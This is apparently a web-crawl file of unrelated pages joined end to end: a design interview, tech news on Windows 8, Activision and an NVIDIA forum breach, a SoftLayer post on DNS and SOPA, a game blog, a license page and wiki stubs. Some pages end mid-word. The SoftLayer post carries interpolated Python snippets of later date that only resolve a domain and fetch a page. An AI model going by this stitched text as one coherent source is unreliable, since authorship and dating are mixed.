I think HTML5 is key, because it's so semantic and has new content semantics like "article" and "section". I think it's made for the way we're publishing now and I think we're going to see big changes in how CMSs are designed to accommodate mobile and orbital content and I think we're going to see an end of pages, in a way. We're going to stop focusing so much on pages and start focusing on content chunks, and how we structure them and how we design them for different use-cases, different devices.
Which technologies are you focusing on right now?
Our front-end developers are using Less and Sass now, not just CSS. Less and Sass are CSS preprocessors that can speed up development, so our front-end people are using those. We're studying the problem of Retina images and what to do about that. We're looking into and working in native. But mainly we're using good, structural HTML5.
Who's leading the way into the future?
Luke Wroblewski is pretty brilliant on mobile. We have him speaking a lot at An Event Apart, he's one of our favorite speakers, he's really funny. This is a guy who, when I first saw him, was talking about web forms, the most boring subject you could possibly pick, and making it fascinating. I saw him at South by Southwest five years ago. It's a really wonderful festival, but there aren't many presentations by individual speakers, it can be very crowded, and it's not necessarily the best environment to hear an individual speaker speak on a technical topic. But Luke had the whole room enthralled and I thought, "This guy can talk about anything, he's amazing". I think he's really smart. He was a lead designer at Yahoo for 10 years, so he's had a lot of experience. I think he's leading the way.
My very humble friend Ethan Marcotte with responsive design, who worked at Happy Cog until recently, absolutely brilliant guy. Jeremy Keith from Brighton and his partners at Clearleft, Richard Rutter, Andy Budd, I think they're really brilliant. Jeremy Keith is a really great thinker. Eric Meyer, my partner. I think Kristina Halvorson has been amazing with content strategy, and she's changing the whole industry. I think she's done for content what I tried to do for web standards.
I think Karen McGrane, who's talking about adaptive content now, just a really brilliant person. When she was very young she was basically the first information architect, at Razorfish. She trained so many people, she trained Liz Danzico who now runs the School of Visual Arts MFA in Interaction Design program in New York. She trained the people who trained the people who trained the people. Some people get 20 years into the business and they're sort of burned out, but she's still really young because she started young. Karen is really vital and she's leading a whole new way of thinking about content management systems and content distribution. These are some of the people that I think are pointing the way. I'm leaving a lot out and I feel bad, I hope none of them are reading this. We try to publish at A Book Apart the people who we think really have something very important to say.
Well, thanks so much.
A pleasure!
By Awwwards Team
awwwards.com
2015-48/3679/en_head.json.gz/946 | Windows 8 Early Adoption is Well Behind Pace Set by Windows 7
Shane McGlaun (Blog) - October 2, 2012 10:18 AM
(Source: ComputerWorld)
Windows 8 not as popular as Windows 7 so far
Microsoft has a lot riding on the Windows 8 operating system. The software giant is hoping that Windows 8 will bring in a slew of consumers upgrading from older computers and older versions of its operating system. Microsoft is also betting that Windows 8 will get a strong foothold in the tablet market as well. So far, users are five times less likely to be running Windows 8 than they were to be running Windows 7 at the same point before its launch. The new statistics come from research firm Net Applications and indicate a lukewarm reception of the Windows 8 operating system by consumers.
Windows 7 was a follow-up to Windows Vista, which was one of the more maligned versions of Microsoft's operating system in recent years. Windows 7 lured many upgraders not only from Vista, but from the older XP operating system as well. Windows 8 doesn't have the luxury Windows 7 had of following an unloved version of Windows.
The statistics offered by Net Applications only count computer users who installed preview versions of Windows 8 and preview versions of Windows 7. The statistics are believed to provide a clear indication of consumer interest in the operating system rather than a desire or need for new computer hardware.
In September, only 0.33% of all computers using Windows relied on Windows 8. That works out to 33 out of every 10,000 Windows machines using Windows 8. By the end of September 2009, with very similar time remaining before the launch of Windows 7, that operating system accounted for 1.64% of all Windows PCs, working out to 164 out of every 10,000 units. Analysts are beginning to believe that Microsoft won't see the uptick in OS sales that it hoped for with Windows 8. Gartner recently advised clients that it predicts the operating system will top out at only 20 to 25% share in the corporate environment. Windows 8 went RTM in August and will launch this month.
Source: ComputerWorld
RE: Show me a Win 8 feature that means anything
MrBungle123
Yes, and it made me want to vomit. That interface has no business on anything with a display over 13" or that is not a touch screen... To add to the whole touch thing, it's fine on my smart phone, or on a slate, but keep your greasy fingers off my computer monitor.
Interesting, I used it on a notebook connected to a large external monitor and have no issues with it. I use the metro screen as a shortcut for launching programs and could not care less about metro apps, so it works fine for me.
It's too in your face. I could deal with it if it only took up, say, 1/4 of the monitor; at least then I wouldn't feel like I had to give it all my attention... although it has such low information density that it would probably be useless for anything but the search at that size. The fact is that MS is doing what they are doing not because Metro is a superior desktop interface (it's not); what it is is a way for them to cram their app store down the throats of the Windows user base. They are hoping to get a 30% cut of all software sales on PCs, and if Metro is a big hit, Windows 9 will probably have an even more crippled version of the desktop than Windows 8.
2015-48/3679/en_head.json.gz/2183 | How the Internet Works (And How SOPA Would Break It) January 12, 2012 Posted by Todd Mitchell in Business, Executive Blog, SoftLayer, Technology Last week, I explained SoftLayer's stance against SOPA and mentioned that SOPA would essentially require service providers like SoftLayer to "break the Internet" in response to reports of "infringing sites." The technical readers in our audience probably acknowledged the point and moved on, but our non-technical readers (and some representatives in Congress) might have gotten a little confused by the references to DNS, domains and IP addresses.
Given how pervasive the Internet is in our daily lives, you shouldn't need to be "a techie" to understand the basics of what makes the Internet work ... And given the significance of the SOPA legislation, you should understand where the bill would "break" the process. Let's take a high-level look at how the Internet works, and from there, we can contrast how it would work if SOPA were to pass.
The Internet: How Sites Are Delivered
You access a device connected in some way to the Internet. This device can be a cell phone, a computer or even a refrigerator. You are connected to the Internet through an Internet Service Provider (ISP) which recognizes that you will be accessing various sites and services hosted remotely. Your ISP manages a network connected to the other networks around the globe ("inter" "network" ... "Internet").
You enter a domain name or click a URL (for this example, we'll use http://www.softlayer.com since we're biased to that site).
Your ISP will see that you want to access "www.softlayer.com" and will immediately try to find someone/something that knows what "www.softlayer.com" means ... This search is known as an NS (name server) lookup. In this case, it will find that "www.softlayer.com" is associated with several name servers.
The first of these name servers to respond with additional information about "softlayer.com" will be used. Domains are typically required to be associated with two or three name servers to ensure that if one is unreachable, requests for that domain name can be processed by another. (The short Python sketch after this list walks through these lookup-and-fetch steps.)
The name server has Domain Name System (DNS) information that maps "www.softlayer.com" to an Internet Protocol (IP) address. When a domain name is purchased and provisioned, the owner will associate that domain name with an authoritative DNS name server, and a DNS record will be created with that name server linking the domain to a specific IP address. Think of DNS as a phone book that translates a name into a phone number for you.
When the IP address you reach sees that you requested "www.softlayer.com," it will find the files/content associated with that request. Multiple domains can be hosted on the same IP address, just as multiple people can live at the same street address and answer the phone. Each IP address only exists in a single place at a given time. (There are some complex network tricks that can negate that statement, but in the interest of simplicity, we'll ignore them.)
When the requested content is located (and generated by other servers if necessary), it is returned to your browser. Depending on what content you are accessing, the response from the server can be very simple or very complex. In some cases, the request will return a single HTML document. In other cases, the content you access may require additional information from other servers (database servers, storage servers, etc.) before the request can be completely fulfilled. In this case, we get HTML code in return.
Your browser takes that code and translates the formatting and content to be displayed on your screen. Often, formatting and styling of pages will be generated from a Cascading Style Sheet (CSS) referenced in the HTML code. The purpose of the style sheet is to streamline a given page's code and consolidate the formatting to be used and referenced by multiple pages of a given website.
The HTML code will reference sources for media that may be hosted on other servers, so the browser will perform the necessary additional requests to get all of the media the website is trying to show. In this case, the most noticeable image that will get pulled is the SoftLayer logo from this location: http://static2.softlayer.com/images/layout/logo.jpg
When the HTML is rendered and the media is loaded, your browser will probably note that it is "Done," and you will have successfully navigated to SoftLayer's homepage.
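To make the lookup-and-fetch steps above concrete, here is a minimal sketch in Python (my illustration, not part of the original post) that mirrors them using only the standard library. It assumes you have network access; the exact output will vary, and these days the server may simply answer with a redirect to HTTPS, but the resolve-then-fetch sequence is the same one your browser performs.

```python
import http.client
import socket

hostname = "www.softlayer.com"

# The NS/DNS lookup steps: ask your configured resolver to translate the
# domain name into one or more IP addresses (the "phone book" lookup).
name, aliases, addresses = socket.gethostbyname_ex(hostname)
print("Canonical name:", name)
print("IP address(es):", addresses)

# The fetch steps: connect to one of those IPs and request the page. The
# Host header tells the server *which* site we want, since multiple
# domains can share a single IP address.
conn = http.client.HTTPConnection(addresses[0], 80, timeout=10)
conn.request("GET", "/", headers={"Host": hostname})
response = conn.getresponse()
html = response.read()
print(response.status, response.reason)
print("Received", len(html), "bytes of HTML")
conn.close()

# A real browser would now parse that HTML, fetch the CSS and images it
# references (like the logo URL above), and render the page.
```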
If SOPA were to pass, the process would look like this:
The Internet: Post-SOPA
You access a device connected in some way to the Internet.
*The Change*
Before your ISP runs an NS lookup, it would have to determine whether the site you're trying to access has been reported as an "infringing site." If http://www.softlayer.com was reported (either legitimately or illegitimately) as an infringing site, your ISP would not process your request, and you'd proceed to an error page. If your ISP can't find any reference to the domain as an infringing site, it would start looking for the name server to deliver the IP address.
SOPA would also enforce filtering from all authoritative DNS providers. If an ISP sends a request for an infringing site to the name server for that site, the provider of that name server would be forced to prevent the IP address from being returned.
One additional method of screening domains would happen at the level of the operator of the domain's gTLD. gTLDs (generic top-level domains) are the ".____" at the end of the domain (.com, .net, .biz, etc.). Each gTLD is managed by a large registry organization, and a gTLD's operator would be required to prevent an infringing site's domain from functioning properly.
If the gTLD registry operator, your ISP, and the domain's authoritative name server provider all agree that the site you're accessing has not been reported as an infringing site, the request resumes the pre-SOPA process.
*Back to the Pre-SOPA Process*
The domain's name server responds.
The domain's IP address is returned.
The IP address is reached to get the content for http://www.softlayer.com.
HTML is returned.
Your browser translates the HTML into a visual format.
External file references from the HTML are returned.
The site is loaded.
The proponents of SOPA are basically saying, "It's difficult for us to keep up with and shut down all of the instances of counterfeiting and copyright infringement online, but it would be much easier to target the larger sites/providers 'enabling' users to access that (possible) infringement." Right now, the DMCA process requires a formal copyright complaint to be filed for every instance of infringement, and the providers who are hosting the content on their network are responsible for having that content removed. That's what our abuse team does full-time. It's a relatively complex process, but it's a process that guarantees us the ability to investigate claims for legitimacy and to hear from our customers (who hear from their customers) in response to the claims.
SOPA does not allow for due process to investigate concerns. If a site is reported to be an infringing site, service providers have to do everything in their power to prevent users from getting there.
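To picture what that enforcement would look like at the resolver level, here is a toy sketch (mine, not SoftLayer's; the blocklist entry is hypothetical) of the check SOPA would bolt onto every name lookup. Note what is missing: nothing in this code, or in the bill, verifies that a report was legitimate before the domain stops resolving.

```python
import socket

# Hypothetical list of reported "infringing sites"; under SOPA it would
# be fed by takedown reports, with no investigation step in between.
BLOCKLIST = {"reported-infringing-site.example"}

def sopa_style_resolve(hostname: str) -> str:
    if hostname.lower().rstrip(".") in BLOCKLIST:
        # No due process: the resolver simply refuses to answer.
        raise LookupError(hostname + " has been reported as infringing")
    return socket.gethostbyname(hostname)

print(sopa_style_resolve("www.softlayer.com"))  # resolves normally
```

Because the check keys on the domain name rather than on the content, it punishes first and asks questions never; and as the first comment below points out, anyone who already knows the site's raw IP address skips this step entirely.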
-@toddmitchell
Permalink bughunter Says: January 12th, 2012 at 7:29pm I'm trying to reconcile "Before your ISP runs an NS lookup, it would have to determine whether the site you’re trying to access has been reported as an “infringing site.” If [so, then] your ISP would not process your request."
And "If a site is reported to be an infringing site, service providers have to do everything in their power to prevent users from getting there."
With the post-SOPA URL request/page retrieval process you describe, all an individual who wanted to visit the infringing Softlayer.com site would need to do is enter the raw IP address, bypassing the DNS retrieval step.
But "everything in their power" could be construed to mean something as complicated as detecting the entry of an IP adress (instead of a URL) and then using a reverse DNS to determine that the user was attempting to reach an infringing site, and blocking the subsequent... or something as simple as doing a periodic DNS lookup of each infringing site on record and blocking all packets originating from those IPs.
Of course, even those methods can be bypassed, and the effect would likely be to create a black market for the workarounds themselves, either as client software or remote services like VPN or even IP reverse-spoofing...
All in all it's a farce, and will do nothing but cost governments and ISPs money.
Permalink khazard Says: January 13th, 2012 at 9:02am Those are great points, bughunter, and they are consistent with why we believe the bill would be inefficient when it comes to enforcement. DNS works because everyone agrees that DNS works. If ISPs are required to police DNS, people intent on going to infringing sites will circumvent it, and ultimately DNS won't work because people won't agree that DNS works any more.
Given the finite resource of IPv4 space, more and more sites will share single IPv4 addresses, making it impossible to take blanket action on a single IP (considering the collateral damage it would cause to hundreds - if not thousands - of legitimate sites).
The hurdles that are being put up for "infringing site" owners and users are just hurdles, not security fences. The biggest worry is that the bad guys will (relatively easily) find a way to circumvent the actions required by the bill, and the only people affected will be good guys who fall victim to bad guys who take advantage of the legislation and use it to their own gain.
Permalink James Hanna Says: January 13th, 2012 at 10:03pm I'm proud of SoftLayer taking a stand against SOPA.
Don't let politicians who know nothing about how the internet works break it. They don't understand how much of an impact it would have on the hosting business in the US.
Keep up the fight never give up.
Permalink Chris Alonzo Says: January 14th, 2012 at 8:29am Finally a good explanation of why SOPA won't work. Thanks Kevin!
Permalink Pixy Misa Says: January 14th, 2012 at 8:45pm Todd, thanks for these posts on SOPA.
As a software developer and writer I certainly understand the need to protect intellectual property rights, but the means by which we do so has to be balanced against effectiveness, cost, and fundamental human rights.
Kevin has it exactly right: DNS works by mutual consent. Any attempts to enforce changes without that consent risk causing the collapse of the system. Notably, there are *already* browser plugins available that will circumvent the SOPA measures. SOPA will not be effective, and is likely to cause considerable collateral damage. It's bad legislation from every angle.
Permalink Daniel Says: January 20th, 2012 at 3:29pm Thank you for taking the right side in this big problem. I am not from America but I will try to keep my severs in this great hosting unless America turns into a digital hell. If America accepts SOPA then some of persons, maybe... a few hundreds of persons? ... would get even richer and happy because we would be forced to pay them, right, great! Yes, that is good for ... 0,000001% of the world... and bad for the other 99,99999%. Mmmmm... I think it is not a good deal.
Permalink Arabvps.net Says: January 22nd, 2012 at 8:18am thanks for these posts on SOPA. SOPA won’t work. :)
Categories: businessexecutive-blogsoftlayertechnologyKeywords: abusebusinesscongresscopyrightdnsgovernmenthostinginfringementintellectual-propertyinternetip-addresseslawslegislationname-serverpipapiracysoftlayersopatechnology Keywords: Abuse, Business, Congress, Copyright, DNS, Government, Hosting, Infringement, Intellectual Property, Internet, Ip Addresses, Laws, Legislation, Name Server, Pipa, Piracy, Softlayer, Sopa, Technology Categories: Business | Executive Blog | SoftLayer | Technology Add new comment | 计算机 |
2015-48/3679/en_head.json.gz/2205 | A Gnome's Ponderings
I'm a gamer. I love me some games and I like to ramble about games and gaming. So, more than anything else, this blog is a place for me to keep track of my ramblings.
If anyone finds this helpful or even (good heavens) insightful, so much the better.
Breaking in a new gaming table
Posted by Lowell Kempf (Gnomekin)
On Friday, Carrie and I visited a friend who had just moved back to Chicago. It wasn't quite a house-warming visit, but it was a chance to see his new place and to play some games. As I've mentioned before, Right Games in Russia sent me some games for review to help get out the word that they were publishing games in English.

We tried out Potion Making: Practice for the first time. It has been said to be one of the most popular games in Russia, but that was more of a warning signal for me. After all, one could argue that Munchkin is one of the most popular games in the U.S., and I would rather watch a Twilight movie marathon than be forced to play Munchkin.

Much to my delight (and a bit to my surprise), Potion Making was actually a lot of fun. The basic idea of the game is that all of the cards are both formulas and ingredients. If cards are on the table, they are ingredients. If they are in your hand, they are formulas. You can either add a card to the table, adding to the available ingredients on hand, or complete a formula using the ingredients from the table to make a potion. One twist is that some of the completed potions are ingredients in more complex formulas, and you can use other people's completed potions to make more complex potions.

Now, the game is a light one. It is a very information-heavy game in the sense that every card is a formula and an ingredient. However, with the exception of a few special spell cards, all the cards interact in the same way. And there's also no real way that you have conflict, except by gaffling an ingredient before someone else can use it.

However, the theme is very immersive. The mechanics of the game and the idea of the game join together very well. What's it about? Making potions. What do you do? Mix ingredients together. And the artwork on the cards is beautiful and really brings out the theme. It isn't the next Agricola, but it is a very pleasant social game.

One thing we wished we had was a mat that showed all sixteen ingredients so we could track what was on the table more easily.

After that, we played The Enigma of Leonardo, a game we had already tried as a two-player game. However, I really wanted to see how it would work as a multi-player game.

Each player has a cross of cards, and you are trying to match three symbols in a row in your cross, earning a token of that symbol. The game is a race to get seven tokens. You play a card from your hand to replace a card on your cross. However, the card you replace goes onto the next player's cross, replacing the card in the same position. Their old card gets discarded.

The cards are illustrated with pictures from da Vinci's notebooks and are quite pretty. That said, they really don't play any real part in the mechanics of the game. When you get down to it, the game is completely abstract, and they could have themed it with circuits or coins or just abstract symbols.

However, the gameplay is solid. I have never played a game with mechanics quite like it, and they really do work. And, since you are messing with another player's stuff, it is a game that you can play nasty if you want to. We agreed that it was a solid and fun game.

The week before, I had played Gheos for the first time and I wanted to play it again. My first games of Gheos had been very tight, very nasty games where we cut up and destroyed each other's cultures almost constantly.
This time, we were a hair less aggressive (at least at first) and continents actually got built up. What I realized this meant was that when you break up a larger continent, you can end up with an empty continent with more than one wheat symbol on it. With this in mind, we were suddenly able to start cornering whole cultures in a move. We didn't get to keep them, of course. Still, it opened up new ways for the game to work in my eyes.

We wrapped up with him showing us his iPad and how it could be used as a game system. We played Small World, which goes really fast when all the house-keeping is done for you. It was neat, but I just can't justify getting one just to play games.
2015-48/3679/en_head.json.gz/2274 | — CC BY-NC-ND 2.5 IT
Attribution-NonCommercial-NoDerivs 2.5 Italy
(CC BY-NC-ND 2.5 IT)
You are free to:
Share — copy and redistribute the material in any medium or format
The licensor cannot revoke these freedoms as long as you follow the license terms.
Under the following terms:
Attribution — You must give appropriate credit, provide a link to the license, and indicate if changes were made. You may do so in any reasonable manner, but not in any way that suggests the licensor endorses you or your use.
Non-Commercial — You may not use the material for commercial purposes.
NoDerivatives — If you remix, transform, or build upon the material, you may not distribute the modified material.
No additional restrictions — You may not apply legal terms or technological measures that legally restrict others from doing anything the license permits.
Notices:
You do not have to comply with the license for elements of the material in the public domain or where your use is permitted by an applicable exception or limitation.
No warranties are given. The license may not give you all of the permissions necessary for your intended use. For example, other rights such as publicity, privacy, or moral rights may limit how you use the material.
The applicable mediation rules will be designated in the copyright notice published with the work, or if none then in the request for mediation. Unless otherwise designated in a copyright notice attached to the work, the UNCITRAL Arbitration Rules apply to any arbitration.
If supplied, you must provide the name of the creator and attribution parties, a copyright notice, a license notice, a disclaimer notice, and a link to the material. CC licenses prior to Version 4.0 also require you to provide the title of the material if supplied, and may have other slight differences.
In 4.0, you must indicate if you modified the material and retain an indication of previous modifications. In 3.0 and earlier license versions, the indication of changes is only required if you create a derivative.
Marking guide.
You may also use a license listed as compatible at https://creativecommons.org/compatiblelicenses
A commercial use is one primarily intended for commercial advantage or monetary compensation.
Merely changing the format never creates a derivative.
The license prohibits application of effective technological measures, defined with reference to Article 11 of the WIPO Copyright Treaty.
The rights of users under exceptions and limitations, such as fair use and fair dealing, are not affected by the CC licenses.
You may need to get additional permissions before using the material as you intend.
2015-48/3679/en_head.json.gz/2345 | The keyboard needs to be retired.
blognorg Roseburg, ORPosts: 643Member July 2012 in Hardware It's kind of funny how an interface device that was used for gaming out of necessity has become the norm. You'd think that at this point something better would have become the standard for PC gaming. It's an awkward, carpal tunnel-inducing nightmare. I'm looking forward to the GW2 release, and I think it's cool that they're incorporating some varied gameplay mechanics like jumping puzzles, but it's going to be horrible because of the keyboard. There's a reason why analogs have become the standard for consoles, because they are vastly superior to the four-button setup. Hell, people complain about how imprecise analogs are compared to a mouse, but that pales in comparison to a keyboard's movement in my opinion. I bought a Razer Nostromo a while back, and it's a little better, but it still suffers form only eight directions and no variance of magnitude. The worst part is that I don't even have the option for an analog at this point; they are so nonstandard that even if I wanted to use one, no MMO would support it. Hopefully, as the MMO market keeps expanding, analogs will be a new standard, and that way we'll all still be able to open pickle jars when we're sixty, and things like action combat can be more than a lofty gimmick. EDIT: To clarify, this isn't a K&B vs controller thread. This has more to do with the keyboard not being designed around gaming, and I'm a little sad that we haven't come up with a better stadard. My reasons were ergonomics and limited movement scope. My gripe doesn't have nything to do with controllers, other than the fact that contollers use analog for movement. 0 «1234» Go
Comments SaintGraye Los Angeles, CAPosts: 109Member Uncommon July 2012 No....typically I'd say more, but that effectively sums up my thoughts on the matter. Well, that and "long live WASD!" 0 FredomSekerZ | 计算机 |
2015-48/3679/en_head.json.gz/2677 | Activision Blizzard says Call of Duty: Ghosts will be a huge launch, but stock falls on weak Warcraft numbers
Dean Takahashi May 8, 2013 2:54 PM
Activision Blizzard chief executive Bobby Kotick warned that the industry's leading video game publisher will face serious competition and possible industry headwinds in the holiday selling season. At the same time, he raised estimates for the company's financial performance this year based on an outstanding first quarter.
The mixed outlook suggests that the game business is at a more uncertain time now than it has been in years. The industry is in a transition year for consoles, and competition from smartphones and tablets is bigger than ever. At every turn, Activision Blizzard faces more competition. This outlook is different compared to the company’s last comments in February, and it means that Activision will have to spend more on marketing and advertising to hang on to its customers this fall.
Activision plans a major new launch of its Call of Duty: Ghosts first-person military shooter Nov. 5, with a bigger sales and marketing campaign than ever before for a blockbuster Call of Duty game. But the title will face competition from the likes of Electronic Arts' upcoming Battlefield 4 and other titles coming for the next-generation consoles.
In a call with analysts today, Kotick didn’t name his competitors, but he said that the weakness of Nintendo’s Wii U game console and the coming competition in the second half is making Activision Blizzard extra cautious about predicting good results. A new version of Activision’s Skylanders is coming this fall. That game, Skylanders: Swap Force, features toys with top and bottom halves. Players can swap those halves to form new creatures for use in the video game. But Skylanders will face huge competition starting in August from Disney Infinity, another game-toy hybrid entertainment product.
Skylanders, another billion-dollar franchise launched just two years ago, is now the No. 1 game franchise of the year, said Eric Hirshberg, CEO of Activision Publishing. That makes it bigger than the No. 2 Call of Duty: Black Ops II in the U.S. and Europe. He said Skylanders was doing well despite the weakness of Nintendo’s Wii and Wii U.
The company is still the healthiest firm in the video game business, with more than $4.6 billion in cash. Its business is driven by major franchises, including Call of Duty, World of Warcraft, Skylanders, and PC games such as StarCraft II: Heart of the Swarm. These have helped make the company into the largest publisher of video games, and it has been making more money than rivals such as EA.
But gaming’s No. 1 publisher warned that risks in the second half of 2013 are “more challenging than our earlier view.”
Activision made no mention of major new franchises in the works, such as Blizzard’s new massively multiplayer online game, code-named Titan. But the pressure to launch that game is building.
Kotick said that while World of Warcraft remains the No. 1 fantasy online role-playing game, it lost 1.3 million subscribers in the quarter, leaving the game with 8.3 million players. The company expects that number to fall further by the end of the year. In recognition of competition from free-to-play games, the company is figuring out how to launch updates more frequently. But it does not have a big update, like last year's World of Warcraft: Mists of Pandaria, on the way.
In after-hours trading, Activision Blizzard’s stock price fell 5 percent to $14.49 a share. The fall may be due to the drop in World of Warcraft numbers and the comments about the second half.
“I think WoW numbers are a bigger deal,” said analyst Michael Pachter at Wedbush Securities in an email. “They are not telling us anything we didn’t know before about competition or weak Wii U sales. The surprise is the sequential drop off in WoW subscribers.”
Mike Morhaime, the head of the Blizzard Entertainment division, said in the conference call that his company is working on its first cross-platform free-to-play game, Hearthstone: Heroes of Warcraft, for the PC, Mac, and iPad. Blizzard’s revenue was up due to sales of StarCraft II: Heart of the Swarm, which sold 1.1 million copies in its first two days. But Blizzard saw a decline in Asian subscribers for World of Warcraft. He said the company will launch new game content at a quicker pace to improve engagement. StarCraft II content is now viewable on Korean TV five days a week (as the Koreans are game fanatics and have a special love for StarCraft).
Morhaime said the company is also working to modify Diablo III so that it will ship on the PlayStation 3 console. BlizzCon is coming to the Anaheim Convention Center in November, and tickets sold out in a matter of minutes. He said the company continues to work on Blizzard All-Stars and the unannounced MMO.
“Regardless of the near-term volatility in the industry, our focus and our disciplined approach to our business, which has served us well in the past, will enable us to continue delivering shareholder value in the long term, as we have for the last 20 years,” Kotick said.
Hirshberg said on the call that Call of Duty: Ghosts is coming Nov. 5. He said that Activision is showing Ghosts at Microsoft's May 21 event for the debut of the next-generation Xbox in Seattle. Ghosts will have a new story and new characters as well as the biggest sales and marketing campaign ever for a Call of Duty game. That's saying a lot, since Activision Blizzard makes a lot of noise about Call of Duty every year. Kotick said he would not predict a dramatic shift in the business models for the next-generation game consoles, but he said, "We approach new businesses skeptically."
Hirshberg said that the current Call of Duty: Black Ops II saw first quarter usage and engagement that was higher than a year ago. The company has launched another map pack, dubbed Uprising, to keep players engaged. Sales for Black Ops II are higher than Call of Duty: Modern Warfare 3 from the year before. Hirshberg said that Call of Duty’s new business model of selling microtransactions, such as a bacon-wrapped decoration for a gun, is also doing well.
“We introduced an all new business model of selling micro DLC (downloadable content),” he said. “It delivers extra value for our fans but in no way compromises game play.”
For the year, Activision Blizzard expects non-GAAP revenue of $4.25 billion and earnings per share of 82 cents.
2015-48/3679/en_head.json.gz/3199 | NVIDIA Forums suspended after hack
In the wake of recent security breaches at Phandroid's Android Forums, Yahoo!, Formspring and others, NVIDIA has now announced that it has suspended operations of its forums site following the discovery of "suspicious activity". The technology company says that it took the site down last week to investigate intrusions into its systems by unauthorised third parties.
The intruders reportedly gained access to private user data, including usernames, email addresses, and hashed passwords with random salt values. Data in users' "About Me" profiles, such as age, birthdate, gender and location, was also accessed in the breach; however, this information was already publicly accessible on the site.
In its security notice, NVIDIA notes that it is currently "employing additional security measures to minimize the impact of future attacks", adding that it hopes to restore the Forums as soon as possible. Once restored, the company says that it will reset all user passwords and send an email to users with a temporary password and instructions on how to change it. NVIDIA Forums users who re-use the same password on multiple sites are advised to change those passwords as soon as possible. (crve)
2015-48/3679/en_head.json.gz/3970 | CKS Group
This article relies largely or entirely upon a single source. Relevant discussion may be found on the talk page. Please help improve this article by introducing citations to additional sources. (June 2011)
CKS Group was an advertising agency based in Cupertino, California, catering to technology companies. The initials CKS came from the three name partners, Bill Cleary, Mark Kvamme, and Tom Suiter. All three had previously worked for Apple Computer. The company went public in 1995 and merged with USWeb in 1998.
The origins of the company went back to Cleary Communications, a business venture started by Cleary in 1987. Kvamme bought into the venture in 1989, and the CKS name was adopted in 1991 after Suiter joined the other two.
Due to its origins, the company had a natural expertise with interface design and other technical matters that distinguished it from traditional advertising agencies. It also had a ready-made client base, with Apple as one of its major customers. CKS bought a video production studio from Apple and at one point contemplated putting together a cable television channel with Ziff-Davis Publishing. The studio was to be used to create infome | 计算机 |
2015-48/3679/en_head.json.gz/3990 | WWIV
This article is about the bulletin board software. For the concept of future world wars, see World war#Later. For the 2003 film, see The Fourth World War.
This article does not cite any references (sources). Please help improve this article by adding citations to reliable sources. Unsourced material may be challenged and removed. (May 2009)
This article possibly contains original research. Please improve it by verifying the claims made and adding inline citations. Statements consisting only of original research should be removed. (December 2010)
WWIV was a popular brand of bulletin board system software from the late 1980s through the mid-1990s. The modifiable source code allowed a sysop to customize the main BBS program for their particular needs and aesthetics. WWIV also allowed tens of thousands of BBSes to link together, forming a worldwide proprietary computer network, the WWIVnet, similar to FidoNet, but with fewer problems[clarification needed][citation needed] related to forum management.
WWIV started out in early 1984 as a single BBS in Los Angeles, California, run by Wayne Bell, who wrote the original 1.0 version in BASIC as a high school programming project, and shared the software with 25 of his friends.
As the popularity of WWIV spread in the mid-1980s, for practical reasons Bell switched to Pascal — specifically Borland's Turbo Pascal 2.0 — creating a compiled version of the BBS but distributing the source code for it to anyone who was interested in their own BBS. This encouraged sysops to develop new features for WWIV, and these ideas were released as "mods" that others could use.
2015-48/3679/en_head.json.gz/4179 | 64-bit Final Cut Pro X now in Mac App Store, reaction is mixed
Apple has released major updates to Final Cut Pro, Motion, and Compressor for …
Image by Apple Inc.
Apple first made public mention of the major overhaul to its Final Cut Pro editing software in April, and on Tuesday, the company announced immediate availability of Final Cut Pro X via the Mac App Store. With full 64-bit, multi-core support and performance, along with a radical new editing timeline, Final Cut Pro X charts a bold new direction for editing. However, not all video editors will be on board with the changes.
A major improvement to Final Cut Pro X, along with its companion Motion 5 and Compressor 4 apps, is a complete rewrite to take advantage of all the power of modern Macs and Mac OS X. This includes across-the-board 64-bit support, OpenCL and Grand Central Dispatch support, and full ColorSync managed, 4K resolution-independent workflow. It brings major performance improvements, including background processing of rendering, effects, and imports, as well as the ability to fully utilize all CPU and GPU resources in any given machine.
That power comes along with a major change in the user interface, though. Borrowing ideas from the latest versions of iMovie, FCPX now sports a new "Magnetic Timeline." Clips can be easily inserted and rearranged as needed, without worrying about audio sync and other issues. Clips can also be linked with alternate views and takes, audio, and other effects to create a Compound Clip. These grouped clips can also be re-arranged at will without concern for sync or other issues. Supplementing the Magnetic Timeline is a context-sensitive Precision Editor for making fine-grained cuts and trims.
While experienced video editors might find the changes jarring at first, the new timeline promises improved editing speed. "I use the analogy of a bike versus a motorcycle," Larry Jordan, an editor who specializes in Final Cut Pro training, told Ars. "Both have handlebars and two wheels, but there is a whole lot of different in function and performance. The magnetic timeline is amazing, and the precision editor provides a trimming view we've never seen before," he said.
FCPX also includes new features for importing, managing, and using clips. When importing, the content is automatically analyzed for shot angles, faces, and the number of people in shots. This data is then used to organize clips into Smart Groups such as "wide" or "close-up" shots, or the program can show you all the clips with a particular person in them. Additional tagging options make it easy to organize clips and find them quickly while deep in the editing process.
"Final Cut Pro X is the biggest advance in Pro video editing since the original Final Cut Pro," Apple's senior vice president of Worldwide Product Marketing, Phil Schiller, said in a statement. "We have shown it to many of the world's best Pro editors, and their jaws have dropped."
Their jaws may have dropped, but that doesn't mean all editors will welcome the changes with open arms. The radical changes in the timeline will represent a steep learning curve for those accustomed to traditional non-linear editing.
"I think it is a bold move—I can't think of any other company that could pull it off," said Jordan, who had access to early betas of the software for the last few months. "However, I think it is also very polarizing. Dyed-in-the-wool editors are going to be very unhappy."
But Final Cut Pro X includes so many improvements, according to Jordan, that it will be worthwhile for editors to buy the software and start learning the new interface. "My key point is that each editor has different needs, and Final Cut Pro X is a tool to help meet those needs," he said. "If it works for you and your media and your workflow, upgrade. If not, then wait a bit. The world will not end if you continue editing on FCP 7 for a while longer!"
Final Cut Pro X includes built-in color grading tools.
Even with the improved editing and performance, though, there will be some pain. Long-time Final Cut Pro users will quickly note that major applications included in the previous Final Cut Studio, including Color, Soundtrack Pro, and DVD Studio Pro, are no longer available. Final Cut Pro X includes vastly improved audio and color editing, which spokesperson Colin Smith suggested supersedes the need for separate Soundtrack Pro and Color applications. And from Apple's point of view, DVD Studio Pro is a vestigial appendage that is no longer necessary in the era of streaming online video.
Jordan doesn't entirely agree with Apple's assessment of the industry, though. The new color editing and grading tools, including what Jordan calls "power windows," may replace Color for most users. But, while the built-in audio editing, processing, and effects are top notch, Final Cut Pro X just isn't capable of multi-track audio recording. Also, Jordan said, "the inability to apply effects, volume, and pan settings to a track is a huge omission."
